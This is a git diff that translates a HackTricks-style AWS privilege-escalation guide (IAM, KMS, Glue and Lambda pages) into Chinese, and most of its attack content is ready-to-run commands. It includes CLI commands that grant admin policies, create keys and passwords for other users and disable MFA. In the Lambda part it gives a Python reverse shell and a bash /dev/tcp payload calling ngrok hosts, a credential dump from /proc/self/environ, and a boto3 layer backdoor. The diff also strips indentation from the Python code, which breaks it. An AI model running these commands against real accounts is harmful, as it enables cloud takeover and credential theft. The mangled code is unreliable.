change +--actions '[{"JobName": "privesctest"}]' --start-on-creation \ +--schedule "0/5 * * * * *" #Every 5mins, feel free to change ``` - -**Potential Impact:** Privesc to the glue service role specified. +**潜在影响:** 提升到指定的 glue 服务角色。 ### `glue:UpdateJob` -Just with the update permission an attacked could steal the IAM Credentials of the already attached role. +仅凭更新权限,攻击者可以窃取已附加角色的 IAM 凭证。 -**Potential Impact:** Privesc to the glue service role attached. +**潜在影响:** 提升到附加的 glue 服务角色。 -## References +## 参考文献 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md index 7807f6152..10bcb77af 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md @@ -4,7 +4,7 @@ ## IAM -For more info about IAM check: +有关 IAM 的更多信息,请查看: {{#ref}} ../aws-services/aws-iam-enum.md @@ -12,228 +12,189 @@ For more info about IAM check: ### **`iam:CreatePolicyVersion`** -Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions. +授予创建新的 IAM 策略版本的能力,通过使用 `--set-as-default` 标志绕过对 `iam:SetDefaultPolicyVersion` 权限的需求。这使得定义自定义权限成为可能。 **Exploit Command:** - ```bash aws iam create-policy-version --policy-arn \ - --policy-document file:///path/to/administrator/policy.json --set-as-default +--policy-document file:///path/to/administrator/policy.json --set-as-default ``` - -**Impact:** Directly escalates privileges by allowing any action on any resource. +**影响:** 通过允许对任何资源执行任何操作,直接提升权限。 ### **`iam:SetDefaultPolicyVersion`** -Allows changing the default version of an IAM policy to another existing version, potentially escalating privileges if the new version has more permissions. - -**Bash Command:** +允许将 IAM 策略的默认版本更改为另一个现有版本,如果新版本具有更多权限,则可能提升权限。 +**Bash 命令:** ```bash aws iam set-default-policy-version --policy-arn --version-id v2 ``` - -**Impact:** Indirect privilege escalation by enabling more permissions. +**影响:** 通过启用更多权限进行间接权限提升。 ### **`iam:CreateAccessKey`** -Enables creating access key ID and secret access key for another user, leading to potential privilege escalation. - -**Exploit:** +允许为另一个用户创建访问密钥 ID 和秘密访问密钥,从而导致潜在的权限提升。 +**利用:** ```bash aws iam create-access-key --user-name ``` - -**Impact:** Direct privilege escalation by assuming another user's extended permissions. +**影响:** 通过假设其他用户的扩展权限进行直接权限提升。 ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`** -Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation. - -**Exploit for Creation:** +允许创建或更新登录配置文件,包括设置AWS控制台登录的密码,从而导致直接权限提升。 +**创建利用:** ```bash aws iam create-login-profile --user-name target_user --no-password-reset-required \ - --password '' +--password '' ``` - -**Exploit for Update:** - +**利用更新:** ```bash aws iam update-login-profile --user-name target_user --no-password-reset-required \ - --password '' +--password '' ``` - -**Impact:** Direct privilege escalation by logging in as "any" user. +**影响:** 通过以“任何”用户身份登录直接提升权限。 ### **`iam:UpdateAccessKey`** -Allows enabling a disabled access key, potentially leading to unauthorized access if the attacker possesses the disabled key. - -**Exploit:** +允许启用已禁用的访问密钥,如果攻击者拥有已禁用的密钥,可能导致未经授权的访问。 +**利用:** ```bash aws iam update-access-key --access-key-id --status Active --user-name ``` - -**Impact:** Direct privilege escalation by reactivating access keys. +**影响:** 通过重新激活访问密钥直接提升权限。 ### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`** -Enables generating or resetting credentials for specific AWS services (e.g., CodeCommit, Amazon Keyspaces), inheriting the permissions of the associated user. - -**Exploit for Creation:** +允许为特定的AWS服务(例如,CodeCommit,Amazon Keyspaces)生成或重置凭证,继承相关用户的权限。 +**创建利用:** ```bash aws iam create-service-specific-credential --user-name --service-name ``` - -**Exploit for Reset:** - +**重置利用:** ```bash aws iam reset-service-specific-credential --service-specific-credential-id ``` - -**Impact:** Direct privilege escalation within the user's service permissions. +**影响:** 在用户的服务权限中直接提升特权。 ### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`** -Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy. - -**Exploit for User:** +允许将策略附加到用户或组,通过继承附加策略的权限直接提升特权。 +**用户利用:** ```bash aws iam attach-user-policy --user-name --policy-arn "" ``` - -**Exploit for Group:** - +**针对组的利用:** ```bash aws iam attach-group-policy --group-name --policy-arn "" ``` - -**Impact:** Direct privilege escalation to anything the policy grants. +**影响:** 直接提升到策略所授予的任何权限。 ### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`** -Permits attaching or putting policies to roles, users, or groups, enabling direct privilege escalation by granting additional permissions. - -**Exploit for Role:** +允许将策略附加或放置到角色、用户或组,从而通过授予额外权限实现直接的权限提升。 +**角色利用:** ```bash aws iam attach-role-policy --role-name --policy-arn "" ``` - -**Exploit for Inline Policies:** - +**利用内联策略:** ```bash aws iam put-user-policy --user-name --policy-name "" \ - --policy-document "file:///path/to/policy.json" +--policy-document "file:///path/to/policy.json" aws iam put-group-policy --group-name --policy-name "" \ - --policy-document file:///path/to/policy.json +--policy-document file:///path/to/policy.json aws iam put-role-policy --role-name --policy-name "" \ - --policy-document file:///path/to/policy.json +--policy-document file:///path/to/policy.json ``` - -You can use a policy like: - +您可以使用如下策略: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": ["*"], - "Resource": ["*"] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": ["*"], +"Resource": ["*"] +} +] } ``` - -**Impact:** Direct privilege escalation by adding permissions through policies. +**影响:** 通过策略添加权限直接提升权限。 ### **`iam:AddUserToGroup`** -Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions. - -**Exploit:** +允许将自己添加到 IAM 组中,通过继承该组的权限来提升权限。 +**利用:** ```bash aws iam add-user-to-group --group-name --user-name ``` - -**Impact:** Direct privilege escalation to the level of the group's permissions. +**影响:** 直接提升到组权限的级别。 ### **`iam:UpdateAssumeRolePolicy`** -Allows altering the assume role policy document of a role, enabling the assumption of the role and its associated permissions. - -**Exploit:** +允许更改角色的假设角色策略文档,从而启用角色及其相关权限的假设。 +**利用:** ```bash aws iam update-assume-role-policy --role-name \ - --policy-document file:///path/to/assume/role/policy.json +--policy-document file:///path/to/assume/role/policy.json ``` - -Where the policy looks like the following, which gives the user permission to assume the role: - +当策略看起来如下所示时,它授予用户假设角色的权限: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "sts:AssumeRole", - "Principal": { - "AWS": "$USER_ARN" - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "sts:AssumeRole", +"Principal": { +"AWS": "$USER_ARN" +} +} +] } ``` - -**Impact:** Direct privilege escalation by assuming any role's permissions. +**影响:** 通过假设任何角色的权限进行直接权限提升。 ### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`** -Permits uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation. - -**Exploit for SSH Key Upload:** +允许上传用于身份验证到 CodeCommit 的 SSH 公钥和停用 MFA 设备,从而导致潜在的间接权限提升。 +**SSH 密钥上传的利用:** ```bash aws iam upload-ssh-public-key --user-name --ssh-public-key-body ``` - -**Exploit for MFA Deactivation:** - +**利用MFA停用:** ```bash aws iam deactivate-mfa-device --user-name --serial-number ``` - -**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection. +**影响:** 通过启用 CodeCommit 访问或禁用 MFA 保护进行间接权限提升。 ### **`iam:ResyncMFADevice`** -Allows resynchronization of an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection. - -**Bash Command:** +允许重新同步 MFA 设备,可能通过操纵 MFA 保护导致间接权限提升。 +**Bash 命令:** ```bash aws iam resync-mfa-device --user-name --serial-number \ - --authentication-code1 --authentication-code2 +--authentication-code1 --authentication-code2 ``` - -**Impact:** Indirect privilege escalation by adding or manipulating MFA devices. +**影响:** 通过添加或操纵 MFA 设备进行间接权限提升。 ### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`) -With these permissions you can **change the XML metadata of the SAML connection**. Then, you could abuse the **SAML federation** to **login** with any **role that is trusting** it. - -Note that doing this **legit users won't be able to login**. However, you could get the XML, so you can put yours, login and configure the previous back +拥有这些权限后,您可以**更改 SAML 连接的 XML 元数据**。然后,您可以利用**SAML 联邦**以**任何信任它的角色登录**。 +请注意,执行此操作后**合法用户将无法登录**。但是,您可以获取 XML,因此您可以放入自己的,登录并配置之前的设置。 ```bash # List SAMLs aws iam list-saml-providers @@ -249,14 +210,12 @@ aws iam update-saml-provider --saml-metadata-document --saml-provider-ar # Optional: Set the previous XML back aws iam update-saml-provider --saml-metadata-document --saml-provider-arn ``` - > [!NOTE] -> TODO: A Tool capable of generating the SAML metadata and login with a specified role +> TODO: 一个能够生成 SAML 元数据并使用指定角色登录的工具 ### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**) -(Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider. - +(不确定)如果攻击者拥有这些 **权限**,他可以添加一个新的 **Thumbprint** 来管理所有信任该提供者的角色的登录。 ```bash # List providers aws iam list-open-id-connect-providers @@ -265,13 +224,8 @@ aws iam get-open-id-connect-provider --open-id-connect-provider-arn # Update Thumbprints (The thumbprint is always a 40-character string) aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3 ``` - -## References +## 参考文献 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md index 02c05b76d..b954a79f1 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md @@ -4,7 +4,7 @@ ## KMS -For more info about KMS check: +有关 KMS 的更多信息,请查看: {{#ref}} ../aws-services/aws-kms-enum.md @@ -12,8 +12,7 @@ For more info about KMS check: ### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`) -With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone: - +拥有这些权限后,可以**修改密钥的访问权限**,使其可以被其他账户甚至任何人使用: ```bash aws kms list-keys aws kms list-key-policies --key-id # Although only 1 max per key @@ -21,106 +20,91 @@ aws kms get-key-policy --key-id --policy-name # AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default") aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json ``` - policy.json: - ```json { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow all use", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": ["kms:*"], - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "kms:*", +"Resource": "*" +}, +{ +"Sid": "Allow all use", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": ["kms:*"], +"Resource": "*" +} +] } ``` - ### `kms:CreateGrant` -It **allows a principal to use a KMS key:** - +它**允许主体使用 KMS 密钥:** ```bash aws kms create-grant \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - --grantee-principal arn:aws:iam::123456789012:user/exampleUser \ - --operations Decrypt +--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ +--grantee-principal arn:aws:iam::123456789012:user/exampleUser \ +--operations Decrypt ``` +> [!WARNING] +> 授权只能允许某些类型的操作: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) > [!WARNING] -> A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) - -> [!WARNING] -> Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\ -> However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ -> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). - +> 请注意,KMS 可能需要几分钟才能 **在生成授权后允许用户使用密钥**。一旦时间过去,主体可以在不需要指定任何内容的情况下使用 KMS 密钥。\ +> 然而,如果需要立即使用授权 [请使用授权令牌](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token)(查看以下代码)。\ +> 有关 [**更多信息,请阅读此内容**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token)。 ```bash # Use the grant token in a request aws kms generate-data-key \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - –-key-spec AES_256 \ - --grant-tokens $token +--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ +–-key-spec AES_256 \ +--grant-tokens $token ``` - -Note that it's possible to list grant of keys with: - +注意,可以使用以下命令列出密钥的授权: ```bash aws kms list-grants --key-id ``` - ### `kms:CreateKey`, `kms:ReplicateKey` -With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy. - -So, an attacker could abuse this to obtain privesc his access to the key and use it +通过这些权限,可以在不同区域以不同策略复制启用多区域的 KMS 密钥。 +因此,攻击者可以利用这一点来获取对密钥的权限提升并使用它。 ```bash aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "kms:*", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "kms:*", +"Resource": "*" +} +] } ``` - ### `kms:Decrypt` -This permission allows to use a key to decrypt some information.\ -For more information check: +此权限允许使用密钥解密某些信息。\ +有关更多信息,请查看: {{#ref}} ../aws-post-exploitation/aws-kms-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md index d276ef737..c0f2c0d9d 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md @@ -4,7 +4,7 @@ ## lambda -More info about lambda in: +有关 lambda 的更多信息: {{#ref}} ../aws-services/aws-lambda-enum.md @@ -12,23 +12,22 @@ More info about lambda in: ### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`) -Users with the **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** permissions can escalate their privileges.\ -They can **create a new Lambda function and assign it an existing IAM role**, granting the function the permissions associated with that role. The user can then **write and upload code to this Lambda function (with a rev shell for example)**.\ -Once the function is set up, the user can **trigger its execution** and the intended actions by invoking the Lambda function through the AWS API. This approach effectively allows the user to perform tasks indirectly through the Lambda function, operating with the level of access granted to the IAM role associated with it.\\ - -A attacker could abuse this to get a **rev shell and steal the token**: +拥有 **`iam:PassRole`, `lambda:CreateFunction` 和 `lambda:InvokeFunction`** 权限的用户可以提升他们的权限。\ +他们可以 **创建一个新的 Lambda 函数并为其分配一个现有的 IAM 角色**,从而授予该函数与该角色相关联的权限。然后,用户可以 **向此 Lambda 函数编写和上传代码(例如带有 rev shell 的代码)**。\ +一旦函数设置完成,用户可以 **通过 AWS API 触发其执行** 和预期的操作。这种方法有效地允许用户通过 Lambda 函数间接执行任务,操作时使用与其关联的 IAM 角色授予的访问级别。\\ +攻击者可以利用这一点获取 **rev shell 并窃取令牌**: ```python:rev.py import socket,subprocess,os,time def lambda_handler(event, context): - s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); - s.connect(('4.tcp.ngrok.io',14305)) - os.dup2(s.fileno(),0) - os.dup2(s.fileno(),1) - os.dup2(s.fileno(),2) - p=subprocess.call(['/bin/sh','-i']) - time.sleep(900) - return 0 +s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); +s.connect(('4.tcp.ngrok.io',14305)) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +p=subprocess.call(['/bin/sh','-i']) +time.sleep(900) +return 0 ``` ```bash @@ -37,8 +36,8 @@ zip "rev.zip" "rev.py" # Create the function aws lambda create-function --function-name my_function \ - --runtime python3.9 --role \ - --handler rev.lambda_handler --zip-file fileb://rev.zip +--runtime python3.9 --role \ +--handler rev.lambda_handler --zip-file fileb://rev.zip # Invoke the function aws lambda invoke --function-name my_function output.txt @@ -47,99 +46,83 @@ aws lambda invoke --function-name my_function output.txt # List roles aws iam list-attached-user-policies --user-name ``` - -You could also **abuse the lambda role permissions** from the lambda function itself.\ -If the lambda role had enough permissions you could use it to grant admin rights to you: - +您还可以**滥用lambda角色权限**来自lambda函数本身。\ +如果lambda角色具有足够的权限,您可以使用它授予您管理员权限: ```python import boto3 def lambda_handler(event, context): - client = boto3.client('iam') - response = client.attach_user_policy( - UserName='my_username', - PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess' - ) - return response +client = boto3.client('iam') +response = client.attach_user_policy( +UserName='my_username', +PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess' +) +return response ``` - -It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda. - +也可以在不需要外部连接的情况下泄露lambda的角色凭证。这对于用于内部任务的**网络隔离的Lambdas**将非常有用。如果有未知的安全组过滤您的反向shell,这段代码将允许您直接泄露凭证作为lambda的输出。 ```python def handler(event, context): -    sessiontoken = open('/proc/self/environ', "r").read() -    return { -        'statusCode': 200, -        'session': str(sessiontoken) -    } +sessiontoken = open('/proc/self/environ', "r").read() +return { +'statusCode': 200, +'session': str(sessiontoken) +} ``` ```bash aws lambda invoke --function-name output.txt cat output.txt ``` - -**Potential Impact:** Direct privesc to the arbitrary lambda service role specified. +**潜在影响:** 直接提升到指定的任意 lambda 服务角色。 > [!CAUTION] -> Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction` +> 请注意,即使看起来很有趣,**`lambda:InvokeAsync`** **并不**允许单独**执行 `aws lambda invoke-async`**,你还需要 `lambda:InvokeFunction` -### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission` - -Like in the previous scenario, you can **grant yourself the `lambda:InvokeFunction`** permission if you have the permission **`lambda:AddPermission`** +### `iam:PassRole`,`lambda:CreateFunction`,`lambda:AddPermission` +与之前的场景一样,如果你拥有权限 **`lambda:AddPermission`**,你可以**授予自己 `lambda:InvokeFunction`** 权限。 ```bash # Check the previous exploit and use the following line to grant you the invoke permissions aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \ - --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN" +--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN" ``` - -**Potential Impact:** Direct privesc to the arbitrary lambda service role specified. +**潜在影响:** 直接提升到指定的任意 Lambda 服务角色。 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping` -Users with **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** permissions (and potentially `dynamodb:PutItem` and `dynamodb:CreateTable`) can indirectly **escalate privileges** even without `lambda:InvokeFunction`.\ -They can create a **Lambda function with malicious code and assign it an existing IAM role**. - -Instead of directly invoking the Lambda, the user sets up or utilizes an existing DynamoDB table, linking it to the Lambda through an event source mapping. This setup ensures the Lambda function is **triggered automatically upon a new item** entry in the table, either by the user's action or another process, thereby indirectly invoking the Lambda function and executing the code with the permissions of the passed IAM role. +拥有 **`iam:PassRole`、`lambda:CreateFunction` 和 `lambda:CreateEventSourceMapping`** 权限的用户(可能还包括 `dynamodb:PutItem` 和 `dynamodb:CreateTable`)可以间接 **提升权限**,即使没有 `lambda:InvokeFunction`。\ +他们可以创建一个 **带有恶意代码的 Lambda 函数并将其分配给现有的 IAM 角色**。 +用户可以设置或利用现有的 DynamoDB 表,将其通过事件源映射链接到 Lambda,而不是直接调用 Lambda。此设置确保在表中新增项时,Lambda 函数会 **自动触发**,无论是通过用户的操作还是其他进程,从而间接调用 Lambda 函数并以传递的 IAM 角色的权限执行代码。 ```bash aws lambda create-function --function-name my_function \ - --runtime python3.8 --role \ - --handler lambda_function.lambda_handler \ - --zip-file fileb://rev.zip +--runtime python3.8 --role \ +--handler lambda_function.lambda_handler \ +--zip-file fileb://rev.zip ``` - -If DynamoDB is already active in the AWS environment, the user only **needs to establish the event source mapping** for the Lambda function. However, if DynamoDB isn't in use, the user must **create a new table** with streaming enabled: - +如果DynamoDB在AWS环境中已经激活,用户只需**为Lambda函数建立事件源映射**。然而,如果DynamoDB未在使用中,用户必须**创建一个新的表**并启用流: ```bash aws dynamodb create-table --table-name my_table \ - --attribute-definitions AttributeName=Test,AttributeType=S \ - --key-schema AttributeName=Test,KeyType=HASH \ - --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ - --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES +--attribute-definitions AttributeName=Test,AttributeType=S \ +--key-schema AttributeName=Test,KeyType=HASH \ +--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ +--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES ``` - -Now it's posible **connect the Lambda function to the DynamoDB table** by **creating an event source mapping**: - +现在可以通过**创建事件源映射**来**将Lambda函数连接到DynamoDB表**: ```bash aws lambda create-event-source-mapping --function-name my_function \ - --event-source-arn \ - --enabled --starting-position LATEST +--event-source-arn \ +--enabled --starting-position LATEST ``` - -With the Lambda function linked to the DynamoDB stream, the attacker can **indirectly trigger the Lambda by activating the DynamoDB stream**. This can be accomplished by **inserting an item** into the DynamoDB table: - +通过将 Lambda 函数链接到 DynamoDB 流,攻击者可以 **通过激活 DynamoDB 流间接触发 Lambda**。这可以通过 **向 DynamoDB 表中插入一个项目** 来实现: ```bash aws dynamodb put-item --table-name my_table \ - --item Test={S="Random string"} +--item Test={S="Random string"} ``` - -**Potential Impact:** Direct privesc to the lambda service role specified. +**潜在影响:** 直接提升到指定的 lambda 服务角色。 ### `lambda:AddPermission` -An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource): - +拥有此权限的攻击者可以 **授予自己(或他人)任何权限** (这会生成基于资源的策略以授予对资源的访问): ```bash # Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode) aws lambda add-permission --function-name --statement-id asdasd --action '*' --principal arn: @@ -147,71 +130,62 @@ aws lambda add-permission --function-name --statement-id asdasd --ac # Invoke the function aws lambda invoke --function-name /tmp/outout ``` - -**Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it. +**潜在影响:** 直接提升权限到通过授予修改代码和运行它的权限的 lambda 服务角色。 ### `lambda:AddLayerVersionPermission` -An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information - +拥有此权限的攻击者可以**授予自己(或其他人)权限 `lambda:GetLayerVersion`**。他可以访问该层并搜索漏洞或敏感信息。 ```bash # Give everyone the permission lambda:GetLayerVersion aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion ``` - -**Potential Impact:** Potential access to sensitive information. +**潜在影响:** 可能访问敏感信息。 ### `lambda:UpdateFunctionCode` -Users holding the **`lambda:UpdateFunctionCode`** permission has the potential to **modify the code of an existing Lambda function that is linked to an IAM role.**\ -The attacker can **modify the code of the lambda to exfiltrate the IAM credentials**. - -Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code. +持有 **`lambda:UpdateFunctionCode`** 权限的用户有可能 **修改与 IAM 角色关联的现有 Lambda 函数的代码。**\ +攻击者可以 **修改 Lambda 的代码以提取 IAM 凭证**。 +尽管攻击者可能没有直接调用该函数的能力,但如果 Lambda 函数是预先存在并且正在运行的,那么它很可能会通过现有的工作流或事件被触发,从而间接促进修改后代码的执行。 ```bash # The zip should contain the lambda code (trick: Download the current one and add your code there) aws lambda update-function-code --function-name target_function \ - --zip-file fileb:///my/lambda/code/zipped.zip +--zip-file fileb:///my/lambda/code/zipped.zip # If you have invoke permissions: aws lambda invoke --function-name my_function output.txt # If not check if it's exposed in any URL or via an API gateway you could access ``` - -**Potential Impact:** Direct privesc to the lambda service role used. +**潜在影响:** 直接提升到使用的 lambda 服务角色。 ### `lambda:UpdateFunctionConfiguration` -#### RCE via env variables - -With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands: +#### 通过环境变量进行 RCE +凭借这些权限,可以添加环境变量,这将导致 Lambda 执行任意代码。例如,在 Python 中,可以利用环境变量 `PYTHONWARNING` 和 `BROWSER` 使 Python 进程执行任意命令: ```bash aws --profile none-priv lambda update-function-configuration --function-name --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}" ``` - -For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in: +对于其他脚本语言,还有其他环境变量可以使用。有关更多信息,请查看以下内容中脚本语言的子部分: {{#ref}} https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse {{#endref}} -#### RCE via Lambda Layers +#### 通过 Lambda Layers 进行 RCE -[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) allows to include **code** in your lamdba function but **storing it separately**, so the function code can stay small and **several functions can share code**. - -Inside lambda you can check the paths from where python code is loaded with a function like the following: +[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 允许在您的 Lambda 函数中包含 **代码**,但 **单独存储**,因此函数代码可以保持小巧,并且 **多个函数可以共享代码**。 +在 Lambda 内部,您可以使用以下函数检查加载 Python 代码的路径: ```python import json import sys def lambda_handler(event, context): - print(json.dumps(sys.path, indent=2)) +print(json.dumps(sys.path, indent=2)) ``` - -These are the places: +这些地方是: 1. /var/task 2. /opt/python/lib/python3.7/site-packages @@ -224,73 +198,61 @@ These are the places: 9. /opt/python/lib/python3.7/site-packages 10. /opt/python -For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position). +例如,库 boto3 是从 `/var/runtime/boto3` 加载的(第 4 个位置)。 -#### Exploitation +#### 利用 -It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there. - -For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library: +可以滥用权限 `lambda:UpdateFunctionConfiguration` 来 **添加一个新层** 到一个 lambda 函数。要执行任意代码,这个层需要包含一些 **lambda 将要导入的库。** 如果你能读取 lambda 的代码,你可以很容易找到这一点,还要注意,lambda **可能已经在使用一个层**,你可以 **下载** 这个层并 **在其中添加你的代码**。 +例如,假设 lambda 正在使用库 boto3,这将创建一个包含库最新版本的本地层: ```bash pip3 install -t ./lambda_layer boto3 ``` +您可以打开 `./lambda_layer/boto3/__init__.py` 并 **在全局代码中添加后门**(例如,一个用于提取凭据或获取反向 shell 的函数)。 -You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example). - -Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for 